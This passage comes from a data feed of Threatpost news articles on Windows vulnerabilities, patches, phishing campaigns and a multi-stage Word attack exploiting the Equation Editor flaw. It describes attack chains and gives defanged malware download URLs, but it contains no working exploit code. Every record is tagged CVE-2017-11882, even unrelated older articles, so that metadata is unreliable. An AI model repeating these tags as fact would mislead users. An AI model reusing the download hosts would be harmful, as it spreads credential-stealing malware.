In theory, the issue shouldn\u2019t be exploitable because at one point in the process the system will generate an MD5 hash of a DLL that\u2019s to be loaded, and unless the attacker can replace that DLL with a malicious one that sports the same hash, an attack is impossible. But those constraints may not hold for all attackers, a researcher says.\n\nThe weirdness in Windows 7 and Windows Server 2008 was identified by Cesar Cerrudo of IOActive, and he spent some time looking into exactly what causes it and whether he\u2019d be able to exploit the condition. The issue arises when an installer for a program that is already installed on a given machine is executed. When one of those installers is run, it will automatically elevate the privileges of the current installer process to the System level. That would theoretically give an attacker a local elevation of privilege bug, granting him system privileges.\n\n\u201cHowever, an interesting issue arises during the installation process when running this kind of installer: a temporary file is created in `C:\\Users\\username\\AppData\\Local\\Temp`, which is the temporary folder for the current user. The created file is named `Hx????.tmp` (where `????` seem to be random hex numbers), and it seems to be a COM DLL from Microsoft Help Data Services Module, whose original name is `HXDS.dll`. This DLL is later loaded by the `msiexec.exe` process running under the System account that is launched by the Windows installer service during the installation process,\u201d [Cerrudo wrote in a blog post](<http://blog.ioactive.com/2012/01/free-windows-vulnerability-for-nsa.html?m=1>) explaining the issue.\n\n\u201cWhen the DLL file is loaded, the code in the DLL file runs as the System user with full privileges. 
At first sight this seems to be an elevation of privileges vulnerability since the folder where the DLL file is created is controlled by the current user, and the DLL is then loaded and run under the System account, meaning any user could run code as the System user by replacing the DLL file with a specially-crafted one before the DLL is loaded and executed.\u201d\n\nBut there\u2019s more to it than just that. In order to exploit the weakness, Cerrudo said that an attacker likely would need to create a malicious DLL with the same MD5 hash as the benign one and then replace the original one with the DLL containing the exploit code. The attack in this case would be against the MD5 algorithm itself, because the attacker would need to create a second message with the same hash as the known message. Known as a second preimage attack, it is practically out of reach for most individual attackers.\n\nHowever, Cerrudo says that it may well be possible for an organization such as an intelligence agency that has massive amounts of compute power and resources to be able to execute such an attack. MD5 is known to have a variety of weaknesses, including collision problems, and Microsoft itself stopped including it in its products seven years ago. Cerrudo said that while exploiting the issue he found via a second preimage attack is likely impractical for most attackers, there may be other vectors out there that could accomplish the same task.\n\n\u201cI think that there could be others. I dedicated some time to it, I did research and tried different ways to exploit the issue but this doesn\u2019t mean that I exhausted all possibilities. It\u2019s just a matter of dedicating some time and trying different options like combining this issue with others, abusing some Windows Installer functionality, timing and blocking issues, etc. These are the kind of things I would try if I would have time. 
I wouldn\u2019t discard that someone can come up with an idea to exploit it,\u201d Cerrudo said via email.\n", "cvss3": {}, "published": "2012-01-18T15:20:13", "type": "threatpost", "title": "Elevating Privileges Via Windows Installers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:58", "id": "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "href": "https://threatpost.com/elevating-privileges-windows-installers-011812/76111/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:29", "description": "One of the patches released by Microsoft last week is not providing protection against the vulnerability it was meant to fix, according to a researcher who today accused Microsoft of making functionality a higher priority than security.\n\nAccording to Tyler Reguly, a senior security engineer at nCircle Network Security Inc., last Tuesday\u2019s MS09-008 update does not fix the problem for all users, many of whom may not realize that they\u2019re still vulnerable to attack. \u201cWhen you get a patch from a vendor, you expect it to provide some level of security,\u201d said Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. 
\n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems.\n\nFrom the article:\n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar.\n\nHowever, the latest patches appear to make some changes to those registry keys. 
The effect is that some installed applications aren\u2019t aware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. 
The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d researchers wrote.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201d. 
The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen a user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers wrote.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers an MSHTA command line that downloads and executes an HTA (HTML application) file. Next, the HTA contains an obfuscated PowerShell script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. 
\u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday that this year\u2019s crop of tax scams uses fear-based social engineering to spread the Zdowbot and Omaneat banking Trojans and to collect personal information via spoofed tax sites linked from phishing campaigns.\n\nThe warning comes less than a month before the April 18 tax deadline and adds to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with the email subject line \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warns recipients that they face pending tax-related law enforcement action. 
A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Emails with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. The emails don\u2019t include attachments; instead they carry warnings from a sender purporting to be the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. 
The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. 
But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity.\n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others, and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad users into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. 
\n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affect all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action, so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": 
"https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 have been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some JavaScript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try to renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. 
To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. 
The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworthy Computing Group said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. 
It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "cvss3": {}, "published": "2011-12-20T16:01:26", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:07", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring administrator-level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. 
\n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL Server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system.\n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d\n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack.\n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059 for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. 
The company also [issued a security advisory](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API.\n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the security fix suggested are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems.\n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, group manager of Trustworthy Computing at Microsoft, said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that the Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. 
\n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. 
The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. 
An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:54", "description": "The [Pwn2Own contest at the CanSecWest](<https://threatpost.com/why-pwn2own-whats-right-security-030911/>) conference has become one of the landmark events on the calendar each year, as researchers gather with nervous vendors in a tiny room to see who can own which browser on which platform and how quickly. But this year\u2019s contest will have a much different look than past editions, with participants vying for more than $100,000 in cash by amassing points over the course of three days.\n\nThe new format will include the assignment of point values for each of the various targets in the contest, which typically are browsers such as Internet Explorer, Firefox and Chrome running on Mac OS X or Windows machines. In order to win the contest, a participant must have at least one zero-day vulnerability in one of the targets. 
Each successful compromise of a target with a zero-day will be worth 32 points, and unlike in past years, targets will not be removed from the competition once they\u2019ve been successfully compromised by one researcher.\n\nAlso, on the first day of the contest, the organizers from HP\u2019s TippingPoint Zero Day Initiative will announce two previously patched vulnerabilities that contestants can use on each target. They will then have three days to write an exploit that works on a given target, although the points awarded for a win will decrease each day. A win on the first day earns 10 points, nine points on the second day and eight on the third. For those \u201cpublic vulnerabilities\u201d, there won\u2019t be any requirement for a sandbox escape or bypass of protected mode in the browsers.\n\nThe changes are the result of a review of past years\u2019 contests and a desire to make the event fairer for everyone involved. In past years, there was a drawing to see which participant would go first on each target, and once it was successfully compromised, it was off the table for everyone else. There also will be first, second and third places this year, with cash rewards of $60,000, $30,000 and $15,000, respectively. The three researchers with the highest point totals at the end of the three-day contest will win the money.\n\n\u201cWe basically rearchitected the entire thing this year. We wanted to take our limited budget and spread it over three winners in order to give them more incentive to bring their vulns to Pwn2Own,\u201d said Aaron Portnoy, the manager of the security research team at TippingPoint. \u201cWe didn\u2019t think it was fair with the drawing. That opens the door for people having a vulnerability they don\u2019t use at the contest and it doesn\u2019t get fixed.\u201d\n\nIn addition to the main cash prizes, contestants also win the laptops that they\u2019re able to successfully compromise targets on. 
And this year, Google is putting up a prize of $20,000 for every unique set of bugs that can compromise its Chrome browser, without any platform-specific bugs. In order to claim the prize, a participant will have to get full code execution outside of Chrome\u2019s sandbox, but there is no limit to the number of those rewards a researcher can win. So if one participant has three or four of those in his pocket\u2013which seems unlikely\u2013he could earn a serious payday.\n\nGoogle also will pay $10,000 for Chrome vulnerabilities that get code execution outside of the sandbox but also require some OS-specific vulnerability to work, Portnoy said.\n\nThe idea behind all of the changes in this year\u2019s Pwn2Own is to bring the contest closer to the way it was when it began several years ago. The contest also has dropped mobile devices such as iPhones and Android phones as targets.\n\n\u201cWe\u2019re going back to the roots of Pwn2Own,\u201d Portnoy said. \u201cThe mobile platforms have been a barrier to entry. We expect to see more competitors.\u201d\n\nAll of the new vulnerabilities used in the [Pwn2Own contest](<http://pwn2own.zerodayinitiative.com/>) each year are immediately disclosed to the affected vendors as part of the rules of engagement. The inclusion of the known vulnerabilities in target platforms is a way to test the exploit-writing skills of the researchers, as well as drawing attention to the need for people to patch older bugs.\n\n\u201cWe want to show the importance of patching and want to show that the contest will have active participation over three days,\u201d Portnoy said. \u201cWe want people to watch.\u201d\n\nPortnoy said the list of targets for this year\u2019s contest would be available soon. 
